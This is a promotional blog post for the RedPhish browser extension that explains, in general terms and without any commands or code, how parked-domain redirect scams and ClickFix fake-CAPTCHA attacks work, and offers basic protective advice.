Two Browser Attacks You Have Never Heard Of That Are Stealing Millions in 2026

Most people think they're safe online as long as they don't click on obvious spam.

That was true five years ago.

It's not true anymore.

Two attacks are now stealing millions of dollars and infecting thousands of devices every single day. Neither of them looks suspicious. Neither of them triggers warnings from your email provider. And neither of them requires you to download anything shady.

One attack happens when you make a tiny typo in a web address.

The other attack happens when you try to prove you're human.

If you haven't heard of parked domain attacks or ClickFix, you're not alone. Most people haven't. But security researchers are now calling these two threats the most dangerous browser attacks of the year.

This guide explains how both attacks work, why they're spreading so fast, and how RedPhish is the only browser security tool that automatically detects and blocks both.

---

Table of contents

• The problem nobody is talking about
• Attack 1: Parked domains that bite back
• How parked domain attacks actually work
• Attack 2: ClickFix and the fake CAPTCHA trap
• How ClickFix tricks you into infecting yourself
• Why traditional security tools miss both attacks
• How RedPhish blocks parked domains and ClickFix automatically
• How to protect yourself starting today

---

The problem nobody is talking about

Browser attacks have changed.

The old playbook was simple. Criminals sent phishing emails with bad links. Security tools blocked those links. Users learned to look for the padlock icon.

That playbook is broken.

Security researchers at Infoblox found that over 90% of visits to parked domains now redirect people to scams, malware, or phishing pages. A decade ago, that number was less than 5%. (krebsonsecurity.com)

At the same time, ESET reported that ClickFix social engineering attacks surged by 517% in the first half of 2025 alone. This technique is now the second most common attack vector behind only traditional phishing. (infosecurity-magazine.com)

These aren't edge cases.

These are the two fastest growing threats on the internet right now.

And the scary part is that both attacks exploit completely normal behavior. Typing a web address. Clicking a CAPTCHA. Actions you perform every single day without thinking.

---

Attack 1: Parked domains that bite back

A parked domain is a website that exists but doesn't host real content.

You've probably seen them before. You type a URL slightly wrong and land on a generic page filled with ads and search links. Maybe there is a message that says the domain is for sale.

For years these pages were annoying but mostly harmless.

That changed completely.

New research from Infoblox shows that parked domains have transformed from digital clutter into an almost exclusively malicious attack surface. In large scale experiments, more than 90% of visits to parked domains from residential internet connections were redirected to scams, scareware, or malware landing pages. (krebsonsecurity.com)

"A decade ago, research showed that parked domains were mostly harmless and rarely more than digital clutter," said Dr. Renée Burton, Vice President of Infoblox Threat Intel. "Today, our research shows they've become almost exclusively malicious." (cybersecurityasia.net)

The math is brutal.

You mistype one letter in your bank name and land on a parked domain. Within seconds you're staring at a fake login page or a malware download prompt.

You click an old link from a friend and the site they used to visit is now parked. Instead of an error page, you get redirected through a chain of shady advertisers until you land on a scam.

Your child searches for free game coins and clicks on a result that leads to a parked typo domain. The next thing you see is a charge on your credit card statement.

---

How parked domain attacks actually work

When you visit a parked domain, you don't just see a placeholder page.

Behind the scenes, a complex chain of events begins.

The domain owner has opted into something called direct search or zero click parking. This means your visit is instantly sold to advertisers who bid on your traffic based on keywords and your device profile. (krebsonsecurity.com)

Those advertisers often resell your visit to other affiliates. Each step adds another redirect. By the time you reach your final destination, you've passed through multiple traffic distribution systems that profile your device, IP address, and browser.

Researchers found that the malicious redirects only fire for people on home internet connections. If you're using a VPN or corporate network, you often see a harmless parking page instead. This helps attackers avoid detection by automated security scanners. (krebsonsecurity.com)

The Infoblox investigation identified single entities controlling thousands of lookalike domains targeting major platforms like Gmail, YouTube, and Microsoft. Some of these domains even run mail servers to capture emails sent to mistyped addresses. (infoblox.com)

What makes this even worse is that Google's advertising policy change in March 2025 may have accidentally made the problem worse. Google required advertisers to opt in to parking traffic by default. Many domain owners responded by switching to unregulated direct search networks that are willing to serve malicious ads for higher payouts. (infoblox.com)

The result is an entire ecosystem where a simple typo can cost you your bank account, your passwords, or your device.

---

Attack 2: ClickFix and the fake CAPTCHA trap

ClickFix is a different kind of attack.

Instead of hoping you make a typo, criminals using ClickFix trick you into infecting your own device.

The technique first appeared in late 2023 and has exploded in popularity. Security firm ESET found that ClickFix attacks surged by 517% in six months, making it the second most common attack vector behind traditional phishing. (infosecurity-magazine.com)

Here's how it works.

You visit a website. Maybe you clicked a link in an email. Maybe you searched for something and clicked a result. Maybe you scanned a QR code.

The website shows you a fake CAPTCHA or verification prompt. It looks exactly like the "I'm not a robot" boxes you've clicked hundreds of times before.

But when you click the button, something different happens.

Instead of verifying you're human, the page displays instructions telling you to press a combination of keys. Usually it asks you to press Windows+R to open a Run dialog, then Ctrl+V to paste something, then Enter to execute.

What you don't realize is that the page has already copied a malicious command to your clipboard. When you follow the instructions, you're pasting and running malware on your own computer. (cisecurity.org)

---

How ClickFix tricks you into infecting yourself

ClickFix is brilliant in a terrifying way.

Traditional malware needs to find a way past your security software. It needs to exploit a vulnerability or trick you into downloading a file.

ClickFix bypasses all of that by making you do the work yourself.

Because you're the one executing the command, security software often doesn't flag it. You initiated the action. You pasted the code. You pressed Enter. (fieldeffect.com)

Microsoft researchers found that ClickFix campaigns have been used to deliver banking trojans, infostealers, ransomware, remote access tools, and even custom malware from nation state threat actors. One campaign impersonated the US Social Security Administration to deliver remote management software that gave attackers full control over victims' systems. (microsoft.com)

The technique works on both Windows and Mac. In June 2025, researchers observed a campaign targeting macOS users to deliver the Atomic Stealer malware. (microsoft.com)

Nation state groups including Russia's APT28 and Iran's MuddyWater have adopted ClickFix for cyber espionage campaigns, showing that this isn't just a tool for small time criminals. (darktrace.com)

The CIS Cyber Threat Intelligence team tracked ClickFix campaigns that led to ransomware attacks against US state and local government organizations. (cisecurity.org)

ClickFix works because it targets human behavior, not technical vulnerabilities. You've been trained for years to complete CAPTCHAs and verification prompts. Criminals are exploiting that training. (logpoint.com)

---

Why traditional security tools miss both attacks

If parked domains and ClickFix are so dangerous, why doesn't your existing security software block them?

The answer is simple. These attacks are designed specifically to evade traditional defenses.

Parked domain evasion

Parked domain attacks use residential fingerprinting to detect when a security scanner is visiting. If the traffic looks like it came from a security company, VPN, or corporate network, the domain shows a harmless parking page. Only real users on home connections see the malicious redirects. (krebsonsecurity.com)

This means automated blocklists often never see the attack. The domain looks clean when tested but turns malicious for actual victims.

The redirect chains also change constantly. Even if one domain gets blocked, attackers swap it out and keep going.

ClickFix evasion

ClickFix is even harder to block because the user initiates the attack themselves.

Security software is designed to stop malicious files from running. But with ClickFix, there's no file to scan until after the user has already executed the command. The malware downloads only after you paste and run the code. (fieldeffect.com)

Email filters can't help because the malicious page might be reached through a legitimate website that was compromised. Web filters can't help because the page itself isn't hosting malware, just instructions.

Unit 42 researchers noted that ClickFix campaigns exploit multiple entry points including SEO poisoning, malvertising, and spoofed browser alerts. This makes traditional single point defenses ineffective. (paloaltonetworks.com)

The bottom line is that both attacks are specifically engineered to slip through the security tools most people rely on.

---

How RedPhish blocks parked domains and ClickFix automatically

RedPhish takes a different approach.

Instead of relying on static blocklists or file scanning, RedPhish analyzes behavior in real time right in your browser where both attacks actually happen.

Parked domain protection

RedPhish detects the characteristic patterns of malicious parked domains before they can redirect you.

When you visit a suspicious domain, RedPhish looks at multiple signals including domain age, parking indicators, redirect behavior, and content patterns. If the domain matches the profile of a weaponized parking page, RedPhish blocks the load before you ever see the malicious content.

This works even when the domain is brand new and not on any blocklist. It works even when the attackers are fingerprinting traffic to hide from security scanners. RedPhish runs locally in your browser, so it sees exactly what you see.

• Typosquatted bank domains - You mistype your bank address and land on a parked typo domain. RedPhish scores the domain, sees the suspicious redirects and content patterns, and blocks the page before you reach the fake login.

• Expired store links - You click an old email link that now points to a parked domain selling your traffic to scam advertisers. RedPhish detects the risky parking and redirect behavior and stops the load with a clear warning.

• Kids clicking on scam results - A child taps a search result that leads to a parked domain promising free game currency. RedPhish sees that the domain is newly created, parked, and using aggressive redirects, and quietly blocks it before the child ever sees the trap.

ClickFix protection

RedPhish also protects against ClickFix attacks by detecting the social engineering patterns these campaigns use.

When you land on a page that displays a fake CAPTCHA or verification prompt designed to trick you into executing code, RedPhish recognizes the pattern. It analyzes the page content for the characteristic elements of ClickFix lures including fake error messages, clipboard manipulation attempts, and instructions that ask you to open system dialogs.

If RedPhish detects a ClickFix attack, it blocks the page and shows you a warning explaining what was about to happen. You never have to wonder whether a verification prompt is real or fake. RedPhish handles it for you.

This is critical because ClickFix attacks work by exploiting your trust in familiar interfaces. You can't be expected to examine every CAPTCHA you see to figure out if it's legitimate. That's what RedPhish is for.

Why RedPhish is different

Most browser security tools work by checking URLs against blocklists. If the URL is on the list, it gets blocked. If not, it gets through.

That approach can't keep up with parked domains that change constantly or ClickFix pages that are hosted on compromised legitimate websites.

RedPhish uses real time behavioral analysis instead. It looks at what a page is actually doing, not just where it comes from. This means RedPhish can block attacks that no blocklist has ever seen.

RedPhish is also the only browser security tool specifically designed to protect against both parked domain redirects and ClickFix social engineering in a single product. You don't need to install multiple extensions or hope that different tools will cover different threats.

---

How to protect yourself starting today

Parked domains and ClickFix aren't going away. Both attacks are spreading because they work.

The good news is that protecting yourself isn't complicated.

1. Install browser protection that understands both threats

Traditional antivirus runs on your device and scans files. That's not enough anymore.

You need protection that runs in your browser where parked domain redirects and ClickFix pages actually happen. RedPhish blocks both attacks automatically without slowing you down.

2. Stop typing addresses from memory

Use bookmarks for sites you visit often. Let your password manager fill in login URLs so you never accidentally land on a typo domain.

If you must type an address, slow down and double check before pressing Enter.

3. Be suspicious of any verification that asks you to run commands

Real CAPTCHAs and verification prompts never ask you to open a Run dialog, copy and paste code, or execute commands.

If any website asks you to do these things, close the tab immediately. It doesn't matter how legitimate the site looks or how urgent the message seems.

4. Keep your family informed

Parked domain attacks and ClickFix both target everyone, not just technical users.

Make sure the people in your life know about these threats. A quick conversation can prevent a costly mistake.

5. Trust protection over intuition

You can't spot every parked domain redirect. You can't examine every CAPTCHA to see if it's fake.

That's why browser security tools like RedPhish exist. Let the technology do the work so you can browse without constantly second guessing yourself.

---

The bottom line

Two attacks are dominating the threat landscape in 2026.

Parked domains that used to be harmless placeholders now redirect over 90% of visitors to scams and malware. ClickFix attacks have surged over 500% by tricking people into infecting their own devices through fake verification prompts.

Both attacks exploit normal everyday behavior. Both attacks slip past traditional security tools. And both attacks are spreading faster than ever.

RedPhish is the only browser security tool that automatically detects and blocks both parked domain redirects and ClickFix social engineering attacks. It runs in your browser where these attacks actually happen and uses real time behavioral analysis instead of outdated blocklists.

You shouldn't have to become a security expert to stay safe online.

Install RedPhish and let it handle the threats so you can browse in peace.